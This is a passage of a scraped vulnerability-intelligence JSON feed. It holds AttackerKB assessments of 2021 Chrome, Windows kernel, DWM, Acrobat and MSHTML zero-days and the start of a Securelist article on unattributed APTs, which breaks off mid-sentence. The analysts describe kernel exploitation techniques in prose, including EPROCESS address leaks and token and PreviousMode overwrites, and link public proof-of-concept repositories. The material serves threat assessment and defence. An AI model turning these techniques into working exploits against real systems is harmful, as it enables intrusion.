6:55am UTC reported:\n\nThis vulnerability is abused in an exploitation chain. According to the Microsoft advisory it is abused with [Adobe Acrobat CVE-2021-28550](<https://attackerkb.com/topics/6EI6mBj0hQ/cve-2021-28550>).\n\n**gwillcox-r7** at June 17, 2021 4:19pm UTC reported:\n\nThis vulnerability is abused in an exploitation chain. According to the Microsoft advisory it is abused with [Adobe Acrobat CVE-2021-28550](<https://attackerkb.com/topics/6EI6mBj0hQ/cve-2021-28550>).\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-31201", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201"], "modified": "2021-06-11T00:00:00", "id": "AKB:50EC30BE-5E8C-4158-8AA0-06397441F8A5", "href": "https://attackerkb.com/topics/DEo4rIL8JT/cve-2021-31201", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-09T11:15:19", "description": "Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31201.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at June 17, 2021 4:20pm UTC reported:\n\nNot got much to contribute due to limited public information at this time but I did want to note that the `Confidentiality` and `Integrity` scores for this are oddly listed as `Low`, the `Availability` as `None`, and yet `Scope` is marked as `Changed`. My guess is that this is some sort of sandbox related escape given that if we were able to get higher permissions these scores would be a lot higher.\n\n**architect00** at June 09, 2021 6:57am UTC reported:\n\nNot got much to contribute due to limited public information at this time but I did want to note that the `Confidentiality` and `Integrity` scores for this are oddly listed as `Low`, the `Availability` as `None`, and yet `Scope` is marked as `Changed`. My guess is that this is some sort of sandbox related escape given that if we were able to get higher permissions these scores would be a lot higher.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-31199", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201"], "modified": "2021-06-16T00:00:00", "id": "AKB:DBAEA288-D224-49E1-877D-628DFD1CF161", "href": "https://attackerkb.com/topics/GmE7G3wbbK/cve-2021-31199", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-24T20:16:01", "description": "Windows Kernel Information Disclosure Vulnerability \nThe type of information that could be disclosed if an attacker successfully exploited this vulnerability is the contents of Kernel memory. An attacker could read the contents of Kernel memory from a user mode process.\n\nThe team at Kaspersky have reported threat actors are exploiting this Microsoft Windows OS kernel vulnerability\n\nSource: <https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at June 17, 2021 3:23pm UTC reported:\n\nAh good old `NtQuerySystemInformation()` strikes again, never quite going out of style :) In this case CVE-2021-31955 is an information disclosure in good old `ntoskrnl.exe`, aka the Windows kernel itself, that occurs due to a Windows feature supported since Windows Vista known as SuperFetch. By sending a `SystemSuperfetchInformation` class request of type `SuperfetchPrivSourceQuery` via the undocumented `NtQuerySystemInformation()` function, one can obtain the kernel address of the `EPROCESS` structure for the current process. This is REALLY bad since the `EPROCESS` kernel structure contains also contains a pointer to the process\u2019s permissions token. If we know the address of this token, then, provided one has an arbitrary kernel write vulnerability, they can easily overwrite this pointer to point to the permissions token for a higher privilege process, and if this process is running as SYSTEM, they will gain SYSTEM level code execution.\n\nAccording to <https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>, this was used in the wild alongside CVE-2021-31956 to escape the Chrome sandbox and gain SYSTEM on affected users computers, after first compromising Chrome and gaining execution inside the Chrome sandbox with what is suspected to be CVE-2021-21224.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-31955", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224", "CVE-2021-31955", "CVE-2021-31956"], "modified": "2021-06-08T00:00:00", "id": "AKB:21C170FF-C7C6-4BFB-8AED-613970EDA44C", "href": "https://attackerkb.com/topics/NQpSb1TpCN/cve-2021-31955", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-25T11:15:03", "description": "Type confusion in V8 in Google Chrome prior to 90.0.4430.85 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at June 17, 2021 3:06pm UTC reported:\n\nAccording to <https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/> this appears to have been used along with CVE-2021-31955 and CVE-2021-31956, a Windows kernel information leak and a Windows LPE vulnerability, to form a full RCE to go from a user browsing a web page to full SYSTEM control over a target Windows device. This is an extremely powerful and valuable exploit chain, and many exploit brokers are willing to pay large sums of money for these chains as they often are very valuable to nation states who wish to use them for their intelligence operations.\n\nOverall though, on its own it seems like this bug wasn\u2019t super valuable as you only get RCE within the sandbox itself, which is why it was then chained with a Windows kernel bug to escape the Chrome sandbox and gain RCE as SYSTEM on the target device. Therefore the risk for this vulnerability alone is lower, however if we keep in mind the other bugs that existed at the time, the overall risk is quite high.\n\nThere also appears to have been public exploit code available for this vulnerability, available at <https://github.com/avboy1337/1195777-chrome0day>, which was potentially reused by the attackers. In any case at the time that code was released the bug was still unpatched which lead researchers at Kaspersky to conclude that its likely attackers used the code from <https://github.com/avboy1337/1195777-chrome0day> in their attack.\n\nOtherwise this is your typical V8 type confusion bug. V8 seems to have had quite a few type confusion bugs in the past so this is nothing too new. If you want to limit exposure, disable JavaScript in your browser on untrusted sites, which will help prevent users from being exploited by these types of attacks as most of them rely on JavaScript to do set up the environment in Chrome appropriately. That being said disabling JavaScript will break most sites so take this with a grain of salt :)\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-26T00:00:00", "type": "attackerkb", "title": "CVE-2021-21224", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224", "CVE-2021-31955", "CVE-2021-31956"], "modified": "2021-04-28T00:00:00", "id": "AKB:160D34D9-2175-4B27-87F8-0CED51121F50", "href": "https://attackerkb.com/topics/fLcfbPxB38/cve-2021-21224", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-15T17:40:03", "description": "Microsoft DWM Core Library Elevation of Privilege Vulnerability\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at June 17, 2021 5:19pm UTC reported:\n\nPublic PoC code has been supposively making the rounds courtesy of <https://github.com/mavillon1/CVE-2021-33739-POC>. There is also a detailed writeup on this issue at <https://mp.weixin.qq.com/s/ZjJ4kXOCTSez2erVKYzKbg> although it is in Chinese so you will need to translate it.\n\nFrom the translation it seems this was originally discovered as being exploited in the wild by Shadow Lab in May 2021, and then they worked with Anheng Threat Intelligence Center to notify MSRC, who then patched the bug in the June 2021 patch release. The vulnerability is located in `dwmcore.dll`, which is the core DLL for DWM, aka the Desktop Windows Manager, on Windows machines. More specifically, its a UAF caused by an reference count tracking issue of the Tracker Binding Manager object. Its interesting also to note that they state this vulnerability only affects Windows 10 machines and does not affect Windows 8.1 and below; this is reflected in Microsoft\u2019s advisory as well.\n\nTo trigger the vulnerability, one needs to \u201ccreate a CinteractionTrackerBindingManagerMarshaler(0x59) resource and a CinteractionTrackerMarshaler(0x58) resource at the code level, and bind the same CinteractionTrackerMarshaler resource as resource1_id and resource2_id to the CinteractionTrackerBindingManagerMarshaler, and do not manually release the CinteractionTrackerBindingManagerMarshaler resource.\u201d. I won\u2019t discuss it further as the technical details are in the original writeup though but this should provide a brief overview for those interested.\n\nThe conclusion of this writeup notes that technically this vulnerability falls within the scope of Windows DirectComposition component, which has seen increased attacks over the last two years. It also notes that this may have ties to the release of the `Win32k Dark: Attacking The Shadow Part of Graphic Subsystem` presentation at the Cansecwest 2017 conference, where researchers discussed how to attack Windows DirectComposition in more detail.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-33739", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33739"], "modified": "2021-06-15T00:00:00", "id": "AKB:86197DAF-4CA4-4CD7-B1A5-5F00DE015C96", "href": "https://attackerkb.com/topics/0U2q9CRKW5/cve-2021-33739", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-27T04:44:38", "description": "Acrobat Reader DC versions versions 2021.001.20150 (and earlier), 2020.001.30020 (and earlier) and 2017.011.30194 (and earlier) are affected by a Use After Free vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at June 04, 2021 5:25pm UTC reported:\n\nNo real details on this at the moment but according to Adobe\u2019s website at <https://helpx.adobe.com/security/products/acrobat/apsb21-29.html> this is a Use-After-Free bug in Adobe Acrobat that leads to remote code execution when opening a PDF. It was anonymously reported and has been reported to be exploited in the wild in limited targeted attacks against Windows users.\n\nGiven the available information though I would guess that to trigger this vulnerability a user would have to open a PDF containing malicious code in Adobe Acrobat and then the malicious PDF would run some JavaScript or similar to put memory into a stable state such that it would be able to trigger the UAF and gain control of Adobe Acrobat without crashing it.\n\nGiven Adobe Acrobat is popular though the attacker value for this bug is pretty high, though I did deduct a point if only cause an attacker would still need to convince a user to open the PDF. I also set the exploitability at medium as UAF bugs are not that easy to exploit, however web browsers and PDF readers often provide JavaScript engines that allow attackers to more easily control the state of memory, which can greatly ease the process of exploit development. However without knowing more info its difficult to gauge the level of exploitation difficulty for this specific exploit.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-11T00:00:00", "type": "attackerkb", "title": "CVE-2021-28550", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550"], "modified": "2021-09-16T00:00:00", "id": "AKB:132606CF-7B8C-4EE8-BE1C-308811E7B813", "href": "https://attackerkb.com/topics/6EI6mBj0hQ/cve-2021-28550", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-31T20:18:07", "description": "Windows NTFS Elevation of Privilege Vulnerability \nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nAdditionally, an attacker could convince a local user to open a malicious file. The attacker would have to convince the user to click a link, typically by way of an enticement in an email or instant message, and then convince them to open the specially crafted file.\n\nThe team at Kaspersky have reported threat actors are exploiting this Microsoft Windows OS kernel vulnerability\n\nSource: <https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at June 17, 2021 4:04pm UTC reported:\n\nThis is a heap buffer overflow in `ntfs.sys`, one of the Windows kernel drivers, which was patched in June 2021. Heap vulnerabilities in the kernel are notoriously unreliable and hard to exploit, particularly given recent mitigations in Windows 8 and then later in Windows 10 that have introduced additional randomness to the kernel heap as well as additional state checks that will result in Windows terminating immediately if data does not look to be valid. Therefore realize that whilst this exploit has been exploited in the wild, I would imagine the reliability may be questionable or there may have been considerable work done behind the scenes to make the exploit more reliable.\n\nIn any case, the affected function is `NtfsQueryEaUserEaList()` in `ntfs.sys` which processes a list of extended attributes (this is where the `ea` part of the function name comes from) for a file and saves the retrieved values to a buffer. The problem here though is that users can make a Windows system call to access this function and `NtfsQueryEaUserEaList()` and its possible to control the size of the output buffer. However the output buffer\u2019s size has to be 32 bit aligned. This causes an issue as whilst the code does check to make sure the output buffer can hold the content of the extended attribute list with padding, it doesn\u2019t check for integer underflows, meaning that the check is done as though the number was an unsigned integer, yet when copying memory its treated as a signed integer, which can result in the number underflowing and becoming a large positive number, such that a lot of memory is copied into a very small buffer.\n\nThis is a particularly interesting case as most of the time when one combines an integer underflow/overflow with a heap buffer vulnerability, things don\u2019t tend to pan out so well due to the user corrupting too much memory to reliably control the heap. This can cause issues later on when Windows checks the heap state and suddenly finds everything is trashed, resulting in a BSOD if one corrupts kernel heap memory. For this reason, I\u2019m interested to see how the attackers actually managed to accurately control heap memory in this scenario to exploit the vulnerability.\n\nFrom the advisory we are given some hints that the Windows Notification Facility (WNF) was used along with this vulnerability to get arbitrary memory read and write primitives, which is a new kernel exploitation strategy I have not heard about before. It appears this was also new to Kaspersky as well as they mention they will be publishing more information about this technique in the future.\n\nAdditionally, showcasing the sophistication of the attackers who exploited this vulnerability, they also used a rarely used `PreviousMode` overwrite instead of stealing overwriting the `Token` field of the `EPROCESS` structure to steal the token. As mentioned at <https://github.com/oct0xor/presentations/blob/master/2019-02-Overview%20of%20the%20latest%20Windows%20OS%20kernel%20exploits%20found%20in%20the%20wild.pdf>, this field controls which mode the kernel was in prior to performing a system call. This can allow an attacker to perform sensitive actions by essentially tricking the OS into thinking a system call was made from kernel mode when in reality it was not.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-31956", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31956"], "modified": "2021-06-08T00:00:00", "id": "AKB:03F5DDB7-DFAF-4815-9563-05762A387A0A", "href": "https://attackerkb.com/topics/Xixbnqn9qC/cve-2021-31956", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-10T15:12:49", "description": "Windows MSHTML Platform Remote Code Execution Vulnerability\n\n \n**Recent assessments:** \n \n**NinjaOperator** at June 16, 2021 10:56pm UTC reported:\n\nWindows MSHTML Platform (Microsoft proprietary browser engine) enables RCE and is being actively exploited in limited campaigns. \n\uf0a7 Exploitation requires user interaction; thus, feasible threat scenarios include drive-by download, exploit kits, and phishing links. \n\uf0a7 A commercial exploit company reportedly provided the exploit code to Eastern European and Middle Eastern state-sponsored actors\n\n**gwillcox-r7** at June 17, 2021 5:25pm UTC reported:\n\nWindows MSHTML Platform (Microsoft proprietary browser engine) enables RCE and is being actively exploited in limited campaigns. \n\uf0a7 Exploitation requires user interaction; thus, feasible threat scenarios include drive-by download, exploit kits, and phishing links. \n\uf0a7 A commercial exploit company reportedly provided the exploit code to Eastern European and Middle Eastern state-sponsored actors\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-33742", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33742"], "modified": "2021-06-15T00:00:00", "id": "AKB:19A3B42A-68BD-48E1-847B-9BA88408EF2B", "href": "https://attackerkb.com/topics/oLB20MCHnO/cve-2021-33742", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securelist": [{"lastseen": "2022-10-10T08:05:03", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/10/07093719/abstract_threat_actor_attribution-990x400.jpg)\n\nTargeted attack attribution is always a tricky thing, and in general, we believe that attribution is best left to law enforcement agencies. The reason is that, while in 90% of cases it is possible to understand a few things about the attackers, such as their native language or even location, the remaining 10% can lead to embarrassing attribution errors or worse. High-profile actors make every effort to stay undetected inside the victim's infrastructure and to leave as few traces as they can. They implement a variety of techniques to make investigation of their campaigns more difficult. Using LOLBINS, common legitimate pentesting tools, and fileless malware; misleading security researchers by placing false flags\u2014these and other anti-forensic tricks often make threat attribution a matter of luck. That is why there is always a percentage of targeted attacks that remain unattributed for years. Recently, I shared [my TOP 10 list of the most mysterious APT](<https://twitter.com/craiu/status/1573272440704319488>) campaigns/tools on Twitter. In this article, I provide a bit more detail on each case.\n\n## 1\\. Project TajMahal\n\nIn late 2018, we discovered a sophisticated espionage framework, which we dubbed "[TajMahal](<https://securelist.com/project-tajmahal/90240/>)". It consists of two different packages, self-named "Tokyo" and "Yokohama", and is capable of stealing a variety of data, including data from CDs burnt on the victim's machine and documents sent to the printer queue. Each package includes a number of malicious tools: backdoors, keyloggers, downloaders, orchestrators, screen and webcam grabbers, audio recorders, and more. In total, up to 80 malicious modules were discovered.\n\nProject TajMahal had been active for at least five years before we first detected it. What makes it even more mysterious is that its only known victim is a high-profile diplomatic entity. Who was behind the attack, if there were any other victims, or whether the whole toolset was developed to penetrate just one organization\u2014these questions remain unanswered.\n\n## 2\\. DarkUniverse\n\nDarkUniverse is [another APT framework](<https://securelist.com/darkuniverse-the-mysterious-apt-framework-27/94897/>) we discovered and reported on in 2018. It was active in the wild for at least for eight years\u2014from 2009 to 2017\u2014and targeted at least 20 civilian and military entities in Syria, Iran, Afghanistan, Tanzania, Ethiopia, Sudan, Russia, Belarus, and the United Arab Emirates. The malware spreads through spear-phishing emails with a malicious Microsoft Office document as attachment. It consists of several modules responsible for different espionage activities such as keylogging, mail traffic interception, making screenshots, collecting of a wide variety of system information, and more.\n\nThe only prominent case of DarkUniverse being spotted in the wild was when their [sophisticated ItaDuke malware](<https://securelist.com/new-uyghur-and-tibetan-themed-attacks-using-pdf-exploits/35465/>) was dropped with a zero-day PDF exploit conspicuously named "Visaform Turkey.pdf". DarkUniverse remains unattributed, and it is unclear what happened to the actor after 2017.\n\n## 3\\. PuzzleMaker\n\nIn April 2021, we [detected several targeted attacks](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>) using a complex chain of zero-day exploits. To penetrate the system, the actor used a Google Chrome RCE vulnerability. We were not able to obtain the exploit, but suspected the flaw in question was [CVE-2021-21224](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21224>), which enabled an attacker to execute arbitrary code inside the browser sandbox. Once inside, the actor exploited [CVE-2021-31955](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31955>), an information disclosure vulnerability in the Windows kernel, to obtain the kernel address of the EPROCESS structure, and elevated privileges using one more Windows kernel flaw, [CVE-2021-31956](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31956>).\n\nAfter successful exploitation of these vulnerabilities, custom malware consisting of four modules is delivered to the infected system. The modules are a stager, dropper, service, and remote shell, with the last one being the final payload. We dubbed the APT "PuzzleMaker".\n\nThe only weak link to known APT campaigns is a post-exploitation technique that is used both by PuzzleMaker and the CHAINSHOT malware, and by at least two state-sponsored threat actors. However, the technique is publicly known and can be used by various groups independently.\n\n## 4\\. ProjectSauron (aka Strider)\n\nProjectSauron was [first discovered](<https://securelist.com/faq-the-projectsauron-apt/75533/>) in September 2015, when [Kaspersky Anti-Targeted Attack Platform](<https://www.kaspersky.com/enterprise-security/anti-targeted-attack-platform>) detected anomalous network traffic in a customer organization. The traffic originated from a suspicious library loaded into the memory of a domain controller server and registered as a Windows password filter, which has access to plain-text passwords to administrative accounts. It proved to be a part of a complex APT platform targeting government, telecommunication, scientific, military, and financial organizations in Russia, Iran, Rwanda, and possibly, Italian-speaking countries.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/10/06125545/TOP-_10_unattributed_APT_mysteries_01.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/10/06125545/TOP-_10_unattributed_APT_mysteries_01.png>)\n\n**_ProjectSauron got its name from the "Sauron" mentioned in its configuration_**\n\nThe ProjectSauron platform has a modular structure. Its core implants are unique to each victim, with different file names and sizes, and timestamps tailored to the target environment. This way, the artifacts discovered in one organization are of low value to other victims. These core implants act as backdoors that download additional modules and run commands inside the memory. The modules perform specific espionage functions, such as keylogging, stealing documents, or hijacking encryption keys from infected computers and attached USB devices. A special module is responsible for accessing air-gapped systems through infected USB drives.\n\nThe threat actor behind ProjectSauron uses a complex command-and-control infrastructure involving a wide range of different ISPs and a number of IP-addresses across US and Europe. The actor made every possible effort not to create recognizable patterns in its operations. The only thing that can be said with confidence is that this level of sophistication is hardly achievable without a nation-state sponsor. It is also worth noting that the actor probably learned from other high-profile APTs, such as [Duqu](<https://securelist.com/the-mystery-of-duqu-part-ten/32668/>), [Flame](<https://securelist.com/the-flame-questions-and-answers/34344/>), [Equation](<https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/>), and [Regin](<https://securelist.com/regin-nation-state-ownage-of-gsm-networks/67741/>).\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/10/06125628/TOP-_10_unattributed_APT_mysteries_02-1024x675.gif)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/10/06125628/TOP-_10_unattributed_APT_mysteries_02.gif>)\n\n## 5\\. USB Thief\n\nIn 2016, our colleagues at ESET [discovered a type of USB malware](<https://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/>) that featured a tricky self-protection mechanism. Dubbed "USB Thief", it consisted of six files, two of which were configuration files, while the other four were executables. The files were designed to be executed in a pre-defined order, and some of them were AES128-encrypted. The encryption key was generated using a unique USB device ID and certain disk properties. This made it hard to decrypt and run the files anywhere but on the infected USB drive.\n\nThree of the executable files are loaders that load the next-stage file. To ensure that the files are loaded in the correct order, they use hashes of the previously loaded files as their names. Additionally, some of the files check the name of the parent process and terminate if it is wrong. The final payload is a data stealer that looks to the configuration file for information about what data to exfiltrate, how to encrypt it, and where to store. The data is always exfiltrated to a location on the infected USB device.\n\nAnother interesting technique implemented in USB Thief is using portable versions of certain applications, such as Notepad, Firefox, and TrueCrypt, to trick the user into running the first 